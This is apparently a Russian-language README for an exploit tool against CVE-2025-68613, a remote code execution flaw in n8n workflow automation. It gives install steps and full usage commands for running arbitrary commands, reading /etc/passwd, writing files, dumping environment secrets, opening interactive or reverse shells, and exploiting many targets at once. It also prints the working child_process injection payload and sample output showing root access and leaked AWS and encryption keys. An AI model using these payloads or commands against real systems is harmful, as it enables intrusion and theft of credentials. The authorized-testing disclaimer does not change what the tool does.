
n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Удаленное выполнение кода автоматизации рабочих процессов
n8n God Mode Ultimate — это комплексный фреймворк для тестирования безопасности, предназначенный для обнаружения и проверки CVE-2025-68613 в платформах автоматизации рабочих процессов n8n. Эта критическая уязвимость удаленного выполнения кода (RCE) затрагивает версии n8n через внедрение выражений в контекстах выполнения рабочих процессов.
Затронутые версии:
Исправленные версии:
--detect — Только определение версии (самый быстрый, неинтрузивный)--safe — Безопасная проверка уязвимости без эксплуатации--poc — Проверка концепции RCE--exploit — Полный режим эксплуатацииread <файл> — Чтение удаленных файловwrite <файл> <содержимое> — Запись файлов на цель# Python 3.8 или выше
python3 --version
# Менеджер пакетов pip
pip3 --version
# Клонирование репозитория
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate
# Установка необходимых пакетов
pip3 install -r requirements.txt
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6
# Показать меню справки
python3 n8n-godmode-ultimate.py -h
# Определить версию n8n (неинтрузивно)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect
# Безопасная проверка уязвимости
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password
# Проверка концепции RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password
# Полная эксплуатация
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password
# Выполнить одну команду
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --cmd "whoami"
# Прочитать удаленный файл
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --read-file "/etc/passwd"
# Записать удаленный файл
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"
# Извлечь переменные окружения
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --dump-env
# Интерактивная оболочка
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --shell
# Сканирование нескольких целей из файла
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20
# Пакетная эксплуатация
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10
Формат targets.txt:
http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org
В режиме оболочки (--shell):
n8n> whoami # Выполнить команду
n8n> read /etc/passwd # Прочитать файл
n8n> env # Показать переменные окружения
n8n> info # Информация о системе
n8n> history # История команд
n8n> exit # Выйти из оболочки
-u, --url URL URL целевого n8n
-l, --list FILE Файл со списком URL целей
-t, --threads NUM Количество потоков для пакетного сканирования (по умолчанию: 10)
-e, --email EMAIL Email пользователя n8n
-p, --password PASS Пароль пользователя n8n
--detect Только определение версии (самый быстрый)
--safe Безопасная проверка без эксплуатации
--poc Проверка концепции RCE
--exploit Полный режим эксплуатации
--god Включить god mode
--cmd COMMAND Выполнить одну команду
--read-file PATH Прочитать удаленный файл
--write-file PATH Записать удаленный файл
--content DATA Содержимое для операции записи
--dump-env Извлечь все переменные окружения
--shell Режим интерактивной оболочки
--revshell HOST:PORT Полезная нагрузка обратной оболочки
--mode MODE Режим эксплуатации: schedule|webhook|code|expression (по умолчанию: schedule)
--timeout SEC Тайм-аут команды в секундах (по умолчанию: 30)
--cleanup Удалить рабочие процессы после выполнения
-k, --insecure Отключить проверку SSL
-v, --verbose Подробный вывод
-q, --quiet Минимальный вывод
Создает рабочий процесс с запланированным триггером, который автоматически выполняется каждые 3 секунды. Самый надежный метод.
Payload: {{(function(){
return this.process.mainModule.require('child_process')
.execSync('whoami').toString()
})()}}
Создает конечную точку HTTP-вебхука, которая выполняет команды при срабатывании.
Внедряет код непосредственно в узел Code с доступом к child_process.
Ручное выполнение через систему оценки выражений n8n.
Извлекает версию из конфигурации Sentry, закодированной в base64, на странице входа:
<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />
/rest/login — Аутентификация/rest/workflows — Операции CRUD с рабочими процессами/rest/credentials — Перебор учетных данных/rest/executions — Получение журналов выполнения/rest/users — Перебор пользователей/rest/settings — Системная конфигурация[*] n8n God Mode Ultimate v1.0.0
[*] Цель: https://target.example.com
[✓] Версия n8n: 1.36.1
[!] Статус: УЯЗВИМА (< 1.120.4)
[*] Аутентификация успешна
[*] Создание эксплуатационного рабочего процесса...
[*] ID рабочего процесса: hd6LxSY765WBThqd
[*] Выполнение команды: whoami
[✓] Команда выполнена успешно!
[+] Вывод: root
n8n> whoami
[+] root
n8n> read /etc/hostname
[+] n8n-production-server
n8n> env
[+] Переменные окружения:
N8N_ENCRYPTION_KEY=a1b2c3d4e5f6...
DATABASE_HOST=postgres.internal
AWS_ACCESS_KEY_ID=AKIA...
ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ
Этот инструмент предоставлен в образовательных целях и для авторизованного тестирования безопасности. Пользователи должны соблюдать все применимые законы и нормативные акты.
ВЫ ОБЯЗАНЫ:
ВЫ НЕ ДОЛЖНЫ:
Автор НЕ несет ответственности за неправильное использование этого инструмента. Несанкционированный доступ к компьютерным системам является незаконным в соответствии с:
Используйте на свой страх и риск. Вы несете ответственность за свои действия.
Вклад приветствуется! Пожалуйста, следуйте этим рекомендациям:
git checkout -b feature/improvement)git commit -am 'Add new feature')git push origin feature/improvement)Satyam Rastogi
Этот проект лицензирован в соответствии с лицензией MIT — подробности см. в файле LICENSE.
MIT License
Copyright (c) 2025 Satyam Rastogi
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
По вопросам безопасности, пожалуйста, сообщайте ответственно:
⭐ Поставьте звезду этому репозиторию, если вы нашли его полезным!
Сделано 💻 исследователями безопасности для исследователей безопасности